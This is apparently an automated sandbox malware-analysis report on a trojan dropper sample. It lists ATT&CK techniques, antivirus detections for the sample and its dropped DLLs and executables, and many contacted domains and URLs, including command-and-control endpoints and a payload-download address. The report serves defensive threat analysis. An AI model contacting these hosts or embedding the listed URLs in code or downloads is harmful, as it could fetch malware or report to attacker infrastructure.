Valid Accounts	2 Native API	1 Registry Run Keys / Startup Folder	312 Process Injection	121 Masquerading	1 Input Capture	1 System Time Discovery	Remote Services	1 Input Capture	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	Scheduled Task/Job	1 Image File Execution Options Injection	1 Registry Run Keys / Startup Folder	2 Disable or Modify Tools	LSASS Memory	121 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	12 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	1 Image File Execution Options Injection	21 Virtualization/Sandbox Evasion	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	312 Process Injection	NTDS	3 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	12 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	11 Obfuscated Files or Information	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	11 Software Packing	Cached Domain Credentials	3 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
KJEfMLiuRS.exe	87%	Virustotal		Browse
KJEfMLiuRS.exe	96%	ReversingLabs	Win32.Trojan.Vilsel
KJEfMLiuRS.exe	100%	Avira	TR/Drop.Age.apd.1.E
KJEfMLiuRS.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\ogvubeak-omooc.dll	100%	Avira	TR/Dldr.Agent.apd.18
C:\Windows\SysWOW64\olfopeh-outix.exe	100%	Avira	TR/Drop.Age.apd.1.E
C:\Windows\SysWOW64\ubboonook.exe	100%	Avira	TR/Drop.Age.apd.1.E
C:\Windows\SysWOW64\ivtahook-eaceab.dll	100%	Avira	TR/Dldr.Agent.apd.17
C:\Users\user\AppData\Roaming\tmp1D9F.tmp	100%	Avira	TR/Drop.Age.apd.1.E
C:\Windows\SysWOW64\atgusoon-odeas.exe	100%	Avira	TR/Drop.Age.apd.1.E
C:\Windows\SysWOW64\olfopeh-outix.exe	100%	Joe Sandbox ML
C:\Windows\SysWOW64\ubboonook.exe	100%	Joe Sandbox ML
C:\Windows\SysWOW64\atgusoon-odeas.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\ogvubeak-omooc.dll	80%	ReversingLabs	Win32.Trojan.Generic
C:\Windows\SysWOW64\ivtahook-eaceab.dll	81%	ReversingLabs	Win32.Trojan.Generic
C:\Windows\SysWOW64\olfopeh-outix.exe	96%	ReversingLabs	Win32.Trojan.Vilsel

Unpacked PE Files

Source	Detection	Scanner	Label	Download
2.2.olfopeh-outix.exe.400000.0.unpack	100%	Avira	TR/Drop.Age.apd.1.E	Download File
0.0.KJEfMLiuRS.exe.400000.0.unpack	100%	Avira	TR/Drop.Age.apd.1.E	Download File
0.2.KJEfMLiuRS.exe.40e640.1.unpack	100%	Avira	TR/Dropper.Gen	Download File
0.2.KJEfMLiuRS.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
2.0.olfopeh-outix.exe.400000.0.unpack	100%	Avira	TR/Drop.Age.apd.1.E	Download File
1.0.olfopeh-outix.exe.400000.0.unpack	100%	Avira	TR/Drop.Age.apd.1.E	Download File
1.2.olfopeh-outix.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://utbidet-ugeas.biz/d/N?02AC7D265AAC7D265A9D7D0A5AAC7DBA6225536FC3AD7DE6F2AE7910749E531F689C4D085A	100%	Avira URL Cloud	malware
http://jyaxasrewrsmmu.st/	0%	Avira URL Cloud	safe
http://utbidet-ugeas.biz/d/N?0224A77D0D24A77D0D15A7510D24A7E135AD89349425A7BDA526A34B231689443F14975	100%	Avira URL Cloud	malware
http://utbidet-ugeas.biz/d/N?0270CC764670CC764641CC5A4670CCEA7EF9E23FDF71CCB6EE72C8406842E24F7440FC5846	100%	Avira URL Cloud	malware
http://utbidet-ugeas.biz/d/N?022E11CAC92E11CAC91F11E6C92E1156F1A73F83502F110A612C15FCE71C3FF3FB1E21E4C9	100%	Avira URL Cloud	malware
http://utbidet-ugeas.biz/d/N?020CA607B80CA607B83DA62BB80CA69B8085884E210DA6C7100EA231963E883E8A3C9629B8	100%	Avira URL Cloud	malware
http://qvewy.nu/	0%	Avira URL Cloud	safe
http://utbidet-ugeas.biz/d/cc	100%	Avira URL Cloud	malware
http://utbidet-ugeas.biz/d/N?02B6E63A40B6E63A4087E61640B6E6A6783FC873D9B7E6FAE8B4E20C6E84C8037286D61440	100%	Avira URL Cloud	malware
http://utbidet-ugeas.biz/d/N?020A97C9E70A97C9E73B97E5E70A9755DF83B9807E0B97094F0893FFC938B9F0D53AA7E7E7	100%	Avira URL Cloud	malware
http://utbidet-ugeas.biz/d/N?027A3A75947A3A75944B3A59947A3AE9ACF3143C0D7B3AB53C783E43BA48144CA64A0A5	100%	Avira URL Cloud	malware
http://utbidet-ugeas.biz/d/N?02380640623806406209066C623806DC5AB12809FB390680CA3A02764C0A28795008366E62	100%	Avira URL Cloud	malware
http://utbidet-ugeas.biz/d/N?02885B61A6885B61A6B95B4DA6885BFD9E0175283F895BA10E8A5F5788BA755894B86B4	100%	Avira URL Cloud	malware
http://utbidet-ugeas.biz/d/rpt?http://%s.biz/d/G?http://%s.biz/d/N?ntdbg.exeidbg32.exeahuy.exeaset32	100%	Avira URL Cloud	malware
http://69.50.173.166/gdnOT2424.exegrazie.gifhttp://utbidet-ugeas.biz/d/ccUseDflProfileUseExtProfileC	0%	Avira URL Cloud	safe
http://%s.biz/d/G?	0%	Avira URL Cloud	safe
http://utbidet-ugeas.biz/d/N?0259DEF0B359DEF0B368DEDCB359DE6C8BD0F0B92A58DE301B5BDAC69D6BF0C98169EEDEB3	100%	Avira URL Cloud	malware
http://utbidet-ugeas.biz/d/N?020C1E43550C1E43553D1E6F550C1EDF6D85300ACC0D1E83FD0E1A757B3E307A673C2E6	100%	Avira URL Cloud	malware
http://utbidet-ugeas.biz/d/N?02141BBAD9141BBAD9251B96D9141B26E19D35F340151B7A71161F8CF7263583EB242B9	100%	Avira URL Cloud	malware
http://gcwweypsyass.mp/	0%	Avira URL Cloud	safe
http://utbidet-ugeas.biz/d/N?020A97C9E70A97C9E73B97E5E70A9755DF83B9807E0B97094F0893FFC938B9F0D53AA7E	100%	Avira URL Cloud	malware
http://utbidet-ugeas.biz/d/N?020CA607B80CA607B83DA62BB80CA69B8085884E210DA6C7100EA231963E883E8A3C962	100%	Avira URL Cloud	malware
http://utbidet-ugeas.biz/d/N?02380640623806406209066C623806DC5AB12809FB390680CA3A02764C0A28795008366	100%	Avira URL Cloud	malware
http://utbidet-ugeas.biz/d/N?022502EAE32502EAE31402C6E3250276DBAC2CA37A24022A4B2706DCCD172CD3D11532C	100%	Avira URL Cloud	malware
http://utbidet-ugeas.biz/d/N?02DF53E35ADF53E35AEE53CF5ADF537F62567DAAC3DE5323F2DD57D574ED7DDA68EF63C	100%	Avira URL Cloud	malware
http://utbidet-ugeas.biz/d/N?02CDBC4B4FCDBC4B4FFCBC674FCDBCD777449202D6CCBC8BE7CFB87D61FF92727DFD8C6	100%	Avira URL Cloud	malware
http://utbidet-ugeas.biz/d/N?0290EC449890EC4498A1EC689890ECD8A019C20D0191EC843092E872B6A2C27DAAA0DC6	100%	Avira URL Cloud	malware
http://utbidet-ugeas.biz/d/N?028E21AF728E21AF72BF2183728E21334A070FE6EB8F216FDA8C25995CBC0F9640BE118	100%	Avira URL Cloud	malware
http://utbidet-ugeas.biz/d/N?020C1E43550C1E43553D1E6F550C1EDF6D85300ACC0D1E83FD0E1A757B3E307A673C2E6D55	100%	Avira URL Cloud	malware
http://utbidet-ugeas.biz/d/N?0290EC449890EC4498A1EC689890ECD8A019C20D0191EC843092E872B6A2C27DAAA0DC6A98	100%	Avira URL Cloud	malware
http://utbidet-ugeas.biz/d/rpt?	100%	Avira URL Cloud	malware
http://utbidet-ugeas.biz/d/N?02DF53E35ADF53E35AEE53CF5ADF537F62567DAAC3DE5323F2DD57D574ED7DDA68EF63CD5A	100%	Avira URL Cloud	malware
http://%s.biz/d/N?	0%	Avira URL Cloud	safe
http://utbidet-ugeas.biz/d/N?02289E4B28289E4B28199E6728289ED710A1B002B1299E8B802A9A7D061AB0721A18AE6	100%	Avira URL Cloud	malware
http://utbidet-ugeas.biz/d/N?022502EAE32502EAE31402C6E3250276DBAC2CA37A24022A4B2706DCCD172CD3D11532C4E3	100%	Avira URL Cloud	malware
http://utbidet-ugeas.biz/d/N?02CDBC4B4FCDBC4B4FFCBC674FCDBCD777449202D6CCBC8BE7CFB87D61FF92727DFD8C654F	100%	Avira URL Cloud	malware
http://utbidet-ugeas.biz/d/N?028E21AF728E21AF72BF2183728E21334A070FE6EB8F216FDA8C25995CBC0F9640BE118172	100%	Avira URL Cloud	malware
http://utbidet-ugeas.biz/d/N?025C9DA2735C9DA2736D9D8E735C9D3E4BD5B3EBEA5D9D62DB5E99945D6EB39B416CAD8	100%	Avira URL Cloud	malware
http://utbidet-ugeas.biz/d/N?02CCB3E1F2CCB3E1F2FDB3CDF2CCB37DCA459DA86BCDB3215ACEB7D7DCFE9DD8C0FC83C	100%	Avira URL Cloud	malware
http://utbidet-ugeas.biz/d/N?02083A3281083A3281393A1E81083AAEB981147B18093AF2290A3E04AF3A140BB3380A1C81	100%	Avira URL Cloud	malware
http://cavwousmoau.st/	0%	Avira URL Cloud	safe
http://utbidet-ugeas.biz/d/N?020A8DA1850A8DA1853B8D8D850A8D3DBD83A3E81C0B8D612D088997AB38A398B73ABD8F85	100%	Avira URL Cloud	malware
http://utbidet-ugeas.biz/d/N?022E11CAC92E11CAC91F11E6C92E1156F1A73F83502F110A612C15FCE71C3FF3FB1E21E	100%	Avira URL Cloud	malware
http://utbidet-ugeas.biz/d/N?02B6E63A40B6E63A4087E61640B6E6A6783FC873D9B7E6FAE8B4E20C6E84C8037286D61	100%	Avira URL Cloud	malware
http://utbidet-ugeas.biz/d/N?020A8DA1850A8DA1853B8D8D850A8D3DBD83A3E81C0B8D612D088997AB38A398B73ABD8	100%	Avira URL Cloud	malware
http://lpzegvpcu.nu/sproxy.dll	0%	Avira URL Cloud	safe
http://utbidet-ugeas.biz/d/N?027A3A75947A3A75944B3A59947A3AE9ACF3143C0D7B3AB53C783E43BA48144CA64A0A5B94	100%	Avira URL Cloud	malware
http://utbidet-ugeas.biz/d/N?0259DEF0B359DEF0B368DEDCB359DE6C8BD0F0B92A58DE301B5BDAC69D6BF0C98169EED	100%	Avira URL Cloud	malware
http://utbidet-ugeas.biz/d/N?02289E4B28289E4B28199E6728289ED710A1B002B1299E8B802A9A7D061AB0721A18AE6528	100%	Avira URL Cloud	malware
http://utbidet-ugeas.biz/d/N?02083A3281083A3281393A1E81083AAEB981147B18093AF2290A3E04AF3A140BB3380A1	100%	Avira URL Cloud	malware
http://utbidet-ugeas.biz/d/N?02141BBAD9141BBAD9251B96D9141B26E19D35F340151B7A71161F8CF7263583EB242B94D9	100%	Avira URL Cloud	malware
http://utbidet-ugeas.biz/d/N?02885B61A6885B61A6B95B4DA6885BFD9E0175283F895BA10E8A5F5788BA755894B86B4FA6	100%	Avira URL Cloud	malware
http://utbidet-ugeas.biz/d/N?025C9DA2735C9DA2736D9D8E735C9D3E4BD5B3EBEA5D9D62DB5E99945D6EB39B416CAD8C73	100%	Avira URL Cloud	malware
http://69.50.173.166/gdnOT2424.exe	100%	Avira URL Cloud	malware
http://utbidet-ugeas.biz/d/N?02CCB3E1F2CCB3E1F2FDB3CDF2CCB37DCA459DA86BCDB3215ACEB7D7DCFE9DD8C0FC83CFF2	100%	Avira URL Cloud	malware
http://utbidet-ugeas.biz/d/N?0270CC764670CC764641CC5A4670CCEA7EF9E23FDF71CCB6EE72C8406842E24F7440FC5	100%	Avira URL Cloud	malware
http://utbidet-ugeas.biz/d/N?0224A77D0D24A77D0D15A7510D24A7E135AD89349425A7BDA526A34B231689443F1497530D	100%	Avira URL Cloud	malware
http://utbidet-ugeas.biz/d/N?02AC7D265AAC7D265A9D7D0A5AAC7DBA6225536FC3AD7DE6F2AE7910749E531F689C4D0	100%	Avira URL Cloud	malware
http://ssgykumyk.st/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
wbhotxso.ws	64.70.19.203	true	false	unknown
eoidzfagia.ws	64.70.19.203	true	false	unknown
sesqboeqkyqyg.ws	64.70.19.203	true	false	unknown
skffvor.vg	88.198.29.97	true	false	unknown
iydgligpetb.ws	64.70.19.203	true	false	unknown
lqsgfhgcg.ws	64.70.19.203	true	false	unknown
utbidet-ugeas.biz	167.99.35.88	true	true	unknown
oeifsye.vg	88.198.29.97	true	false	unknown
ctiowweyexi.ws	64.70.19.203	true	false	unknown
gqwrm.vg	88.198.29.97	true	false	unknown
ssgqwyuy.ws	64.70.19.203	true	false	unknown
wcqio.vg	88.198.29.97	true	false	unknown
sugwqxczc.vg	88.198.29.97	true	false	unknown
wksmneieulciyq.vg	88.198.29.97	true	false	unknown
hcfigcsf.ws	64.70.19.203	true	false	unknown
sgscmskqmsvi.vg	88.198.29.97	true	false	unknown
mwnkma.vg	88.198.29.97	true	false	unknown
wgcoeoyemo.ws	64.70.19.203	true	false	unknown
ovoykqlc.vg	88.198.29.97	true	false	unknown
yyirivnncliy.ws	64.70.19.203	true	false	unknown
swsiysmmkqigg.ws	64.70.19.203	true	false	unknown
gceqmqu.vg	88.198.29.97	true	false	unknown
gececkkbsocii.vg	88.198.29.97	true	false	unknown
wecfevuygxew.vg	88.198.29.97	true	false	unknown
mybuerovaln.pw	unknown	unknown	true	unknown
uvmmavmiuow.st	unknown	unknown	true	unknown
ssgykumyk.st	unknown	unknown	true	unknown
kjyueawyersmum.museum	unknown	unknown	true	unknown
opyceqenbqqs.mp	unknown	unknown	true	unknown
stqluc.mp	unknown	unknown	true	unknown
wamejcdvbdiw.mp	unknown	unknown	true	unknown
zlrequk.nu	unknown	unknown	true	unknown
wuibcee.nu	unknown	unknown	true	unknown
sgwkqaq.museum	unknown	unknown	true	unknown
tdkakey.st	unknown	unknown	true	unknown
kuegscoauwnco.museum	unknown	unknown	true	unknown
cccyssksykq.museum	unknown	unknown	true	unknown
mwuuqawsyoa.tk	unknown	unknown	true	unknown
cavwousmoau.st	unknown	unknown	true	unknown
uiymgps.mp	unknown	unknown	true	unknown
qepmedm.mp	unknown	unknown	true	unknown
yncfsmisaj.nu	unknown	unknown	true	unknown
ywbwv.st	unknown	unknown	true	unknown
cpidgyyodou.st	unknown	unknown	true	unknown
asxgzel.mp	unknown	unknown	true	unknown
efmgwmd.st	unknown	unknown	true	unknown
kuyekiyyn.mp	unknown	unknown	true	unknown
gevwpaqsgqr.mp	unknown	unknown	true	unknown
curipbeqyczvl.st	unknown	unknown	true	unknown
kawdmyymccbf.st	unknown	unknown	true	unknown
qvmyyuapkk.st	unknown	unknown	true	unknown
zrgoiae.st	unknown	unknown	true	unknown
gkcobelirqy.st	unknown	unknown	true	unknown
eqhznmjkuzatqo.mp	unknown	unknown	true	unknown
eeakfwo.museum	unknown	unknown	true	unknown
dcozymosctd.pw	unknown	unknown	true	unknown
gcwweypsyass.mp	unknown	unknown	true	unknown
aimgagne.mp	unknown	unknown	true	unknown
tdxqi.nu	unknown	unknown	true	unknown
suerncbuckd.nu	unknown	unknown	true	unknown
ehuausdiet.mp	unknown	unknown	true	unknown
jxqgjqq.st	unknown	unknown	true	unknown
emqhj.mp	unknown	unknown	true	unknown
qvesoxmeyeyo.museum	unknown	unknown	true	unknown
wtrjyeues.mp	unknown	unknown	true	unknown
csqrqoawfme.tk	unknown	unknown	true	unknown
mloaky.mp	unknown	unknown	true	unknown
mcydsewd.mp	unknown	unknown	true	unknown
ymjmccm.mp	unknown	unknown	true	unknown
ubkukyoqxnyx.tk	unknown	unknown	true	unknown
lgipm.mp	unknown	unknown	true	unknown
uyriu.st	unknown	unknown	true	unknown
xwqkugqjrwceo.mp	unknown	unknown	true	unknown
zwaxagmgxusaq.mp	unknown	unknown	true	unknown
tigrmsgpa.nu	unknown	unknown	true	unknown
jyaxasrewrsmmu.st	unknown	unknown	true	unknown
qivzpbqveslmvh.nu	unknown	unknown	true	unknown
kocuxowua.mp	unknown	unknown	true	unknown
axugskgmxksem.mp	unknown	unknown	true	unknown
ujwcmmd.mp	unknown	unknown	true	unknown
oktdaeqs.mp	unknown	unknown	true	unknown
trqmaudkiuqe.mp	unknown	unknown	true	unknown
bjynqfygauaqu.tk	unknown	unknown	true	unknown
okszm.nu	unknown	unknown	true	unknown
nonemtugazb.mp	unknown	unknown	true	unknown
qlyiuhnqg.mp	unknown	unknown	true	unknown
sxqom.mp	unknown	unknown	true	unknown
gbtrsh.st	unknown	unknown	true	unknown
ordfyctqfzrtv.nu	unknown	unknown	true	unknown
ujkceco.st	unknown	unknown	true	unknown
nzuws.st	unknown	unknown	true	unknown
kmuusce.mp	unknown	unknown	true	unknown
mevqfyci.pw	unknown	unknown	true	unknown
lpzegvpcu.nu	unknown	unknown	true	unknown
agfzxqquo.st	unknown	unknown	true	unknown
jymauen.mp	unknown	unknown	true	unknown
idusseszvtags.nu	unknown	unknown	true	unknown
qvewy.nu	unknown	unknown	true	unknown
demyp.nu	unknown	unknown	true	unknown
tstwnth.museum	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://utbidet-ugeas.biz/d/N?0270CC764670CC764641CC5A4670CCEA7EF9E23FDF71CCB6EE72C8406842E24F7440FC5846	true	Avira URL Cloud: malware	unknown
http://utbidet-ugeas.biz/d/N?02AC7D265AAC7D265A9D7D0A5AAC7DBA6225536FC3AD7DE6F2AE7910749E531F689C4D085A	true	Avira URL Cloud: malware	unknown
http://utbidet-ugeas.biz/d/N?020A97C9E70A97C9E73B97E5E70A9755DF83B9807E0B97094F0893FFC938B9F0D53AA7E7E7	true	Avira URL Cloud: malware	unknown
http://utbidet-ugeas.biz/d/N?020CA607B80CA607B83DA62BB80CA69B8085884E210DA6C7100EA231963E883E8A3C9629B8	true	Avira URL Cloud: malware	unknown
http://utbidet-ugeas.biz/d/N?022E11CAC92E11CAC91F11E6C92E1156F1A73F83502F110A612C15FCE71C3FF3FB1E21E4C9	true	Avira URL Cloud: malware	unknown
http://utbidet-ugeas.biz/d/N?02B6E63A40B6E63A4087E61640B6E6A6783FC873D9B7E6FAE8B4E20C6E84C8037286D61440	true	Avira URL Cloud: malware	unknown
http://utbidet-ugeas.biz/d/N?02380640623806406209066C623806DC5AB12809FB390680CA3A02764C0A28795008366E62	true	Avira URL Cloud: malware	unknown
http://utbidet-ugeas.biz/d/N?0259DEF0B359DEF0B368DEDCB359DE6C8BD0F0B92A58DE301B5BDAC69D6BF0C98169EEDEB3	true	Avira URL Cloud: malware	unknown
http://utbidet-ugeas.biz/d/N?0290EC449890EC4498A1EC689890ECD8A019C20D0191EC843092E872B6A2C27DAAA0DC6A98	true	Avira URL Cloud: malware	unknown
http://utbidet-ugeas.biz/d/N?020C1E43550C1E43553D1E6F550C1EDF6D85300ACC0D1E83FD0E1A757B3E307A673C2E6D55	true	Avira URL Cloud: malware	unknown
http://utbidet-ugeas.biz/d/N?02DF53E35ADF53E35AEE53CF5ADF537F62567DAAC3DE5323F2DD57D574ED7DDA68EF63CD5A	true	Avira URL Cloud: malware	unknown
http://utbidet-ugeas.biz/d/N?02CDBC4B4FCDBC4B4FFCBC674FCDBCD777449202D6CCBC8BE7CFB87D61FF92727DFD8C654F	true	Avira URL Cloud: malware	unknown
http://utbidet-ugeas.biz/d/N?022502EAE32502EAE31402C6E3250276DBAC2CA37A24022A4B2706DCCD172CD3D11532C4E3	true	Avira URL Cloud: malware	unknown
http://utbidet-ugeas.biz/d/N?028E21AF728E21AF72BF2183728E21334A070FE6EB8F216FDA8C25995CBC0F9640BE118172	true	Avira URL Cloud: malware	unknown
http://utbidet-ugeas.biz/d/N?02083A3281083A3281393A1E81083AAEB981147B18093AF2290A3E04AF3A140BB3380A1C81	true	Avira URL Cloud: malware	unknown
http://utbidet-ugeas.biz/d/N?020A8DA1850A8DA1853B8D8D850A8D3DBD83A3E81C0B8D612D088997AB38A398B73ABD8F85	true	Avira URL Cloud: malware	unknown
http://utbidet-ugeas.biz/d/N?027A3A75947A3A75944B3A59947A3AE9ACF3143C0D7B3AB53C783E43BA48144CA64A0A5B94	true	Avira URL Cloud: malware	unknown
http://utbidet-ugeas.biz/d/N?02141BBAD9141BBAD9251B96D9141B26E19D35F340151B7A71161F8CF7263583EB242B94D9	true	Avira URL Cloud: malware	unknown
http://utbidet-ugeas.biz/d/N?02289E4B28289E4B28199E6728289ED710A1B002B1299E8B802A9A7D061AB0721A18AE6528	true	Avira URL Cloud: malware	unknown
http://utbidet-ugeas.biz/d/N?025C9DA2735C9DA2736D9D8E735C9D3E4BD5B3EBEA5D9D62DB5E99945D6EB39B416CAD8C73	true	Avira URL Cloud: malware	unknown
http://utbidet-ugeas.biz/d/N?02CCB3E1F2CCB3E1F2FDB3CDF2CCB37DCA459DA86BCDB3215ACEB7D7DCFE9DD8C0FC83CFF2	true	Avira URL Cloud: malware	unknown
http://utbidet-ugeas.biz/d/N?02885B61A6885B61A6B95B4DA6885BFD9E0175283F895BA10E8A5F5788BA755894B86B4FA6	true	Avira URL Cloud: malware	unknown
http://utbidet-ugeas.biz/d/N?0224A77D0D24A77D0D15A7510D24A7E135AD89349425A7BDA526A34B231689443F1497530D	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://jyaxasrewrsmmu.st/	olfopeh-outix.exe, 00000001.00000003.554423722.00000000001AB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://utbidet-ugeas.biz/d/cc	KJEfMLiuRS.exe, KJEfMLiuRS.exe, 00000000.00000002.313746840.0000000000408000.00000040.00000001.01000000.00000003.sdmp, olfopeh-outix.exe, olfopeh-outix.exe, 00000001.00000002.580871014.0000000000407000.00000040.00000001.01000000.00000004.sdmp	true	Avira URL Cloud: malware	unknown
http://utbidet-ugeas.biz/d/N?0224A77D0D24A77D0D15A7510D24A7E135AD89349425A7BDA526A34B231689443F14975	olfopeh-outix.exe, 00000001.00000002.581619697.0000000002E6A000.00000004.00000010.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://qvewy.nu/	olfopeh-outix.exe, 00000001.00000003.534472661.00000000001AB000.00000004.00000020.00020000.00000000.sdmp, olfopeh-outix.exe, 00000001.00000003.535431114.00000000001AB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://utbidet-ugeas.biz/d/N?027A3A75947A3A75944B3A59947A3AE9ACF3143C0D7B3AB53C783E43BA48144CA64A0A5	olfopeh-outix.exe, 00000001.00000002.581619697.0000000002E6A000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://%s.biz/d/G?	KJEfMLiuRS.exe, KJEfMLiuRS.exe, 00000000.00000002.313746840.0000000000408000.00000040.00000001.01000000.00000003.sdmp, olfopeh-outix.exe, olfopeh-outix.exe, 00000001.00000002.580871014.0000000000407000.00000040.00000001.01000000.00000004.sdmp	false	Avira URL Cloud: safe	low
http://utbidet-ugeas.biz/d/N?02141BBAD9141BBAD9251B96D9141B26E19D35F340151B7A71161F8CF7263583EB242B9	olfopeh-outix.exe, 00000001.00000002.581619697.0000000002E6A000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://gcwweypsyass.mp/	olfopeh-outix.exe, 00000001.00000002.581619697.0000000002E6A000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://69.50.173.166/gdnOT2424.exegrazie.gifhttp://utbidet-ugeas.biz/d/ccUseDflProfileUseExtProfileC	KJEfMLiuRS.exe, 00000000.00000002.313746840.0000000000408000.00000040.00000001.01000000.00000003.sdmp, olfopeh-outix.exe, 00000001.00000002.580871014.0000000000407000.00000040.00000001.01000000.00000004.sdmp	true	Avira URL Cloud: safe	unknown
http://utbidet-ugeas.biz/d/N?02885B61A6885B61A6B95B4DA6885BFD9E0175283F895BA10E8A5F5788BA755894B86B4	olfopeh-outix.exe, 00000001.00000002.581619697.0000000002E6A000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://utbidet-ugeas.biz/d/rpt?http://%s.biz/d/G?http://%s.biz/d/N?ntdbg.exeidbg32.exeahuy.exeaset32	KJEfMLiuRS.exe, 00000000.00000002.313746840.0000000000408000.00000040.00000001.01000000.00000003.sdmp, olfopeh-outix.exe, 00000001.00000002.580871014.0000000000407000.00000040.00000001.01000000.00000004.sdmp	false	Avira URL Cloud: malware	unknown
http://utbidet-ugeas.biz/d/N?020C1E43550C1E43553D1E6F550C1EDF6D85300ACC0D1E83FD0E1A757B3E307A673C2E6	olfopeh-outix.exe, 00000001.00000002.581619697.0000000002E6A000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://utbidet-ugeas.biz/d/N?020CA607B80CA607B83DA62BB80CA69B8085884E210DA6C7100EA231963E883E8A3C962	olfopeh-outix.exe, 00000001.00000002.581619697.0000000002E6A000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://utbidet-ugeas.biz/d/N?020A97C9E70A97C9E73B97E5E70A9755DF83B9807E0B97094F0893FFC938B9F0D53AA7E	olfopeh-outix.exe, 00000001.00000002.581619697.0000000002E6A000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://utbidet-ugeas.biz/d/N?022502EAE32502EAE31402C6E3250276DBAC2CA37A24022A4B2706DCCD172CD3D11532C	olfopeh-outix.exe, 00000001.00000002.581619697.0000000002E6A000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://utbidet-ugeas.biz/d/N?02380640623806406209066C623806DC5AB12809FB390680CA3A02764C0A28795008366	olfopeh-outix.exe, 00000001.00000002.581619697.0000000002E6A000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://utbidet-ugeas.biz/d/N?02DF53E35ADF53E35AEE53CF5ADF537F62567DAAC3DE5323F2DD57D574ED7DDA68EF63C	olfopeh-outix.exe, 00000001.00000002.581619697.0000000002E6A000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://utbidet-ugeas.biz/d/N?02CDBC4B4FCDBC4B4FFCBC674FCDBCD777449202D6CCBC8BE7CFB87D61FF92727DFD8C6	olfopeh-outix.exe, 00000001.00000002.581619697.0000000002E6A000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://utbidet-ugeas.biz/d/N?0290EC449890EC4498A1EC689890ECD8A019C20D0191EC843092E872B6A2C27DAAA0DC6	olfopeh-outix.exe, 00000001.00000002.581619697.0000000002E6A000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000004.00000000.402926439.0000000008260000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.335172353.0000000008260000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.371940609.0000000008260000.00000004.00000001.00020000.00000000.sdmp	false		high
http://utbidet-ugeas.biz/d/N?028E21AF728E21AF72BF2183728E21334A070FE6EB8F216FDA8C25995CBC0F9640BE118	olfopeh-outix.exe, 00000001.00000002.581619697.0000000002E6A000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://utbidet-ugeas.biz/d/rpt?	KJEfMLiuRS.exe, KJEfMLiuRS.exe, 00000000.00000002.313746840.0000000000408000.00000040.00000001.01000000.00000003.sdmp, olfopeh-outix.exe, olfopeh-outix.exe, 00000001.00000002.580871014.0000000000407000.00000040.00000001.01000000.00000004.sdmp	false	Avira URL Cloud: malware	unknown
http://utbidet-ugeas.biz/d/N?02289E4B28289E4B28199E6728289ED710A1B002B1299E8B802A9A7D061AB0721A18AE6	olfopeh-outix.exe, 00000001.00000002.581619697.0000000002E6A000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://%s.biz/d/N?	KJEfMLiuRS.exe, KJEfMLiuRS.exe, 00000000.00000002.313746840.0000000000408000.00000040.00000001.01000000.00000003.sdmp, olfopeh-outix.exe, olfopeh-outix.exe, 00000001.00000002.580871014.0000000000407000.00000040.00000001.01000000.00000004.sdmp	false	Avira URL Cloud: safe	low
